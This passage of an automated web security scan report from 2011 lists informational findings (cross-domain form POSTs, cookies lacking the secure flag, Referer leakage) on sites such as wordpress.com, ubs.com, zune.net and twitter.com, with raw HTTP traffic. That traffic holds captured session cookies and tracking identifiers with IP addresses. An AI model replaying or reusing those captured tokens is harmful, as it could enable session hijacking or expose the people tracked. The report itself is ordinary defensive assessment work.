onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f3ca49352c&origin=http\u00253A\u00252F\u00252Fsocial.zune.net\u00252Ff23b1025f4&relation=parent.parent&transport=postmessage","nodeType":"page","externalURL":"http:\/\/social.zune.net\/MOVIES\/0\/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web&culture=en-US","pageId":null,"widgetID":"connect_widg
...[SNIP]...
11. Cross-domain POST  previous  next
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

11.1. https://www.drtserver.com/microsoft/1/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.drtserver.com
Path:   /microsoft/1/login.html

Issue detail

The page contains a form which POSTs data to the domain www.microsoftaffiliates.com. The form contains the following fields:

Request

GET /microsoft/1/login.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.drtserver.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Thu, 07 Jul 2011 13:27:09 GMT
Server: Apache/2.2.16 (Unix)
Location: https://www.microsoftaffiliates.com/index.html?content=Microsoft
X-Server-Name: www@dc1dtweb59
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17547

<html>
<script language="JavaScript">
<!--
function medopen() {
   coolopenWindow=window.open("/flash/mediakit.html","medopen","scrollbars=0,menubar=0,statusbar=0,toolbar=0,height=560,width=362,out
...[SNIP]...
<td class="login">
   
<form method="POST" action="https://www.microsoftaffiliates.com/" style="margin:0; padding:0 0 0 40px;">

Email / Affiliate ID:&nbsp;&nbsp;
<input name="DL_AUTH_USERNAME" type="text" class="login-text">
...[SNIP]...
11.2. http://www.gnu.org/licenses/gpl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The page contains a form which POSTs data to the domain crm.fsf.org. The form contains the following fields:

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:22 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:21:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
</p>
    <form action="https://crm.fsf.org/civicrm/profile/create&amp;reset=1&amp;gid=31" method="post">
<div>
...[SNIP]...
12. SSL cookie without secure flag set  previous  next
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

12.1. https://wordpress.com/wp-login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wordpress.com
Path:   /wp-login.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-login.php HTTP/1.1
Host: wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Jul 2011 11:21:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: hiab=on; path=/; domain=.wordpress.com
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.wordpress.com
Content-Length: 3666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <meta
...[SNIP]...
12.2. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif?dcsdat=1309960265581&dcssip=www2.ubs.com&dcsuri=%2F1%2Fssl%2Fe%2Fcontact%2Fcontact.html&dcsqry=%3FNavLB_Www%3D1309960260&dcsref=http%3A%2F%2Fwww.ubs.com%2F&WT.co_f=14.96.190.152-2611613264.30161891&WT.vt_sid=14.96.190.152-2611613264.30161891.1309960204815&WT.tz=-5&WT.bh=8&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=UBS%20-%20General%20contact%20and%20feedback%20form&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1057x822&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.5.0&WT.dl=0&WT.ssl=1&WT.es=www2.ubs.com%2F1%2Fssl%2Fe%2Fcontact%2Fcontact.html&WT.UBS.lp=en&WT.vt_f_tlh=1309960237 HTTP/1.1
Host: www.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAC5oFE4OaBROAQAAAAEAAAAuaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981865583:ss=1309981804815

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:07 GMT
Server: Apache
Set-Cookie: ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAEtoFE4OaBROAQAAAAEAAABLaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--; Max-Age=315360000; Expires=Sat, 03-Jul-2021 13:51:07 GMT; Path=/; Version=1; HttpOnly
ETag: "0e92d9a760c71:2f23"
Last-Modified: Wed, 07 Mar 2007 11:00:42 GMT
X-Powered-By: ASP.NET
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: image/gif
Connection: close
Content-Length: 43

GIF89a.............!.......,...........D..;
12.3. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/njs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /7/dcs6nkwvw00000ouf3tc69cst_8i5h/njs.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /7/dcs6nkwvw00000ouf3tc69cst_8i5h/njs.gif HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Apache
Set-Cookie: ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAJ9pFE4OaBROAQAAAAEAAACfaRRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--; Max-Age=315360000; Expires=Sat, 03-Jul-2021 13:56:47 GMT; Path=/; Version=1; HttpOnly
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 11:00:42 GMT
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 43
Accept-Ranges: bytes
ETag: "0e92d9a760c71:2f23"
X-Powered-By: ASP.NET
Connection: close

GIF89a.............!.......,...........D..;
13. Cross-domain Referer leakage  previous  next
There are 13 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

13.1. http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web HTTP/1.1
Host: social.zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940283855:ss=1309940283855; lastCulture=en-US

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: ec73cbe3-4917-444b-8d6c-93f60f1a09fb,848807
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Content-Length: 30161
Cache-Control: no-cache, no-store
Expires: Wed, 06 Jul 2011 11:19:49 GMT
Date: Wed, 06 Jul 2011 11:19:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
<span><a class="twitter-share-button" data-count="horizontal" href="http://twitter.com/share">Tweet</a></span>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<li><a href="http://privacy.microsoft.com/en-US/default.aspx" target="_blank">Privacy Statement</a>
...[SNIP]...
<li><a href="http://www.microsoft.com/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx" target="_blank">Trademarks</a>
...[SNIP]...
<li><a href="http://zuneinsider.com/" target="_blank">Zune Insider</a>
...[SNIP]...
<li><a href="http://www.microsoftaffiliates.com/index.html?content=Zune" target="_blank">Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.facebook.com/zune" onclick="window.open(this.href);return false;" onkeypress="window.open(this.href);return false;"><img alt="Image: Facebook" height="16" src="https://www.zune.net/NR/rdonlyres/CD7A2D12-EE37-468B-B1A4-82DECA1F3B8C/0/ico_facebook.png" width="15" /></a> <a href="http://www.myspace.com/zune" onclick="window.open(this.href);return false;" onkeypress="window.open(this.href);return false;"><img alt="Image: MySpace" height="16" src="https://www.zune.net/NR/rdonlyres/D8108120-F1EF-4A43-A955-533A33308329/0/ico_myspace.png" width="15" /></a> <a href="http://www.twitter.com/zune" onclick="window.open(this.href);return false;" onkeypress="window.open(this.href);return false;"><img alt="Image: Twitter" height="16" src="https://www.zune.net/NR/rdonlyres/9BCAAEF1-B5A9-4F19-B31B-7691F0EB2344/0/ico_twitter.png" width="15" /></a> <a href="http://www.youtube.com/zune" onclick="window.open(this.href);return false;" onkeypress="window.open(this.href);return false;"><img alt="Image: YouTube" height="16" src="https://www.zune.net/NR/rdonlyres/F6FCB448-562F-4CF8-A9B3-D292A6701535/0/ico_youtube.png" width="15" />
...[SNIP]...
<param name="initparams" value="hostname=queueControl,zunetag=" />
<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none;">
<img src="http://go.microsoft.com/fwlink/?LinkId=108181" alt="Get Microsoft Silverlight"
style="border-style: none" />
</a>
...[SNIP]...
&#64;latin,DashboardGenreListText=Rock&#64;Hip Hop&#64;R&#38;B &#47; Soul&#64;Pop&#64;Electronic &#47; Dance&#64;Latin,isSubscriptionAvailable=True"
name="initparams" />
<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none;
display: block; width: 100%; height: 100%; background: #fff;">
<img src="http://social.zune.net/xweb/lx/pic/dash_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none" />
...[SNIP]...
<noscript><img alt="" border="0" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsqv1k1u100004v2eennc1xv_9v6o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /></noscript>
...[SNIP]...
13.2. http://social.zune.net/xweb/lx/js/zpagescripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /xweb/lx/js/zpagescripts.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xweb/lx/js/zpagescripts.js?ver=11032080 HTTP/1.1
Host: social.zune.net
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940283855:ss=1309940283855; lastCulture=en-US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 07:12:10 GMT
Accept-Ranges: bytes
ETag: "0175929813cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 237480
Cache-Control: max-age=0
Date: Wed, 06 Jul 2011 11:20:02 GMT
Connection: close
Vary: Accept-Encoding

(function(c){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var d=function(g){var f="";for(var j=0;j<g.length;j++){var h=g.charCodeAt(j);if(h<128){f+=String.fromCharCode(h)}
...[SNIP]...
';var d=this.getParams();for(var a in d){b+=[a]+'="'+d[a]+'" '}var c=this.getVariablePairs().join("&");if(c.length>0){b+='flashvars="'+c+'"'}b+="/>"}else{this.addVariable("MMplayerType","ActiveX");b='<object codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,115,0" id="'+this.getAttribute("id")+'" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="'+this.getAttribute("width")+'" height="'+this.getAttribute("height")+'" style="'+this.getAttribute("style")+'">';b+='<param name="movie" value="'+this.getAttribute("swf")+'" />
...[SNIP]...
nitParams" name="initParams" value="autostart=false,muted=False,captions=True,markers=True,isexplicitandischild='+isExplicitAndIsChild+",signinrequired="+signinRequired+",m="+videoPath+'" />');a.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none; display: block; background: #fff; width: 500px; height: 292px; text-align: center;">');a.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none; margin-top: 39px;"/>
...[SNIP]...
<param name="initParams" name="initParams" value="'+d+'" />');a.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none; display: block; background: #fff; width: 660px; height: 400px; text-align: center;">');a.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none; margin-top: 93px;"/>
...[SNIP]...
<br/>'+LocStr.lxUtilResources.PodcastReportAConcernFooterText+'<a target="_blank" href="http://www.microsoft.com/info/cpyrtinfrg.htm">http://www.microsoft.com/info/cpyrtinfrg.htm</a>
...[SNIP]...
<param name="initParams" value="'+initParams+'" />');html.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration:none;display:block;background:#fff;width:500px;height:292px;text-align:center;margin:0 auto;">');html.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style:none;margin-top:39px;"/>
...[SNIP]...
13.3. http://support.microsoft.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.microsoft.com
Path:   /contactus/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /contactus/?ws=mscom HTTP/1.1
Host: support.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=i1uamGByzAEkAAAAMTE3OGIyZjAtODU1YS00ODkyLWJjMWQtZTk0ZGYwZTUxNTczA8yEsKPgt2O1DtENnBnnqhS55ao1; expires=Tue, 13-Sep-2011 22:00:48 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B06
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Wed, 06 Jul 2011 11:20:48 GMT
Connection: close
Content-Length: 43442

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="cu_selector" /><meta name="DCSext.sup_cln" content="en-us" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCSext.sup_ln" content=
...[SNIP]...
<img src="/library/images/support/CN/CPS_IE9_icon.png" alt="Get Internet Explorer 9 today. Free download." /> <a href="http://clk.atdmt.com/MRT/go/335774571/direct/01/">Get Internet Explorer 9 today. Free download.</a>
...[SNIP]...
</a>
<a id="ad_brnd_corpflyoutad_go" href="http://clk.atdmt.com/MRT/go/335774571/direct/01/">
<img src="/library/images/support/en-US/IE9_btn-up.png" alt="" onmouseover="this.src='/library/images/support/en-US/IE9_btn-hov.png';" onmouseout="this.src='/library/images/support/en-US/IE9_btn-up.p
...[SNIP]...
<li class="gsfx_brnd_LocalLink"><a href="http://www.microsoftstore.com/store/msstore/home?WT.mc_id=SMCBAR_ENUS_ADR_BUYALL" id="L_195944"><span>
...[SNIP]...
<strong><a href="http://support.xbox.com/">Contact Xbox Support</a>
...[SNIP]...
<strong><a href="http://www.zune.net/en-US/support">Contact Zune Support</a>
...[SNIP]...
<strong><a href="http://explore.live.com/windows-live-help-center">Windows Live Support</a>
...[SNIP]...
<strong><a href="http://support.msn.com/">MSN Support</a>
...[SNIP]...
<strong><a href="https://admin.innotrac.com/Microsoft/ics/">Check the Status of your Replacement order</a>
...[SNIP]...
<strong><a href="https://microsoft.young-america.com/Lookup.aspx">Check the Status of your Rebate</a>
...[SNIP]...
<strong><a href="http://www.microsoftstore.com/store/msstore/home?WT.mc_id=SMCCNT_ENUS_TEXT_BUY">Microsoft Store Online</a>
...[SNIP]...
<strong><a href="http://marketplace.xbox.com">Xbox LIVE Marketplace</a>
...[SNIP]...
<strong><a href="http://www.zune.net/en-us/products/learningcenter/zunemarketplace/default.htm">Zune Marketplace</a>
...[SNIP]...
<noscript><img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No" /></noscript>
...[SNIP]...
13.4. http://twitter.com/intent/session  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /intent/session?return_to=%2Fintent%2Ftweet%3Fsource%3Dwebclient%26text%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx&source=webclient&text=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; k=173.193.214.243.1309445969207029; guest_id=v1%3A13086187569807267; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--68bfb23ecb75192721faa31141f4cc93644031bd

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309950927-60253-54088
ETag: "36b99243bfb315e43cf77ffb34f0123a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:15:27 GMT
X-Runtime: 0.01137
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8d1959539e4fb4977e5ce9becc49dc0a878abe53
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 4344
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width; initial-scale=1.0;
...[SNIP]...
</title>

<link href="http://a0.twimg.com/a/1309899422/phoenix/css/tfw.bundle.css" media="screen" rel="stylesheet" type="text/css" />
<!--[if (IEMobile) & (lt IE 9)]>
...[SNIP]...
</script>

<script src="http://a1.twimg.com/a/1309899422/javascripts/loadrunner.js" data-main="tfw/intents/main" data-path="http://a1.twimg.com/a/1309899422/javascripts/modules" type="text/javascript"></script>
...[SNIP]...
13.5. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=presspass%20controls&qsc0=0&FORM=BMME HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=B1549D9132CF43DB9C0083ED224302D8; domain=.bing.com; path=/
Set-Cookie: MUID=E66C4FBB1F654227B7791E57B71ACE3C; expires=Fri, 05-Jul-2013 11:20:46 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=E66C4FBB1F654227B7791E57B71ACE3C%2cc6677c8aca3745ff845f289943d4ca46; expires=Fri, 05-Jul-2013 11:20:46 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=BMME; expires=Fri, 05-Jul-2013 11:20:46 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=057CEF80CDCE41578008FF1313A56DBC; expires=Fri, 05-Jul-2013 11:20:46 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:46 GMT; domain=.bing.com; path=/
Content-Length: 36088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://www.microsoft.com/presspass/press/1996/aug96/cntrlpdpr.mspx" onmousedown="return si_T('&amp;ID=SERP,5046.1')">Microsoft Announces Immediate Availability of ActiveX <strong>
...[SNIP]...
<h3><a href="http://www.microsoft.com/presspass/features/2003/dec03/12-17SoxComplianceQA.mspx" onmousedown="return si_T('&amp;ID=SERP,5063.1')">New Microsoft Offering to Help Address Sarbanes-Oxley Compliance ...</a>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/ActiveX_control" onmousedown="return si_T('&amp;ID=SERP,5098.1')">ActiveX - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#ActiveX_controls" onmousedown="return si_T('&amp;ID=SERP,5079.1')">ActiveX <strong>
...[SNIP]...
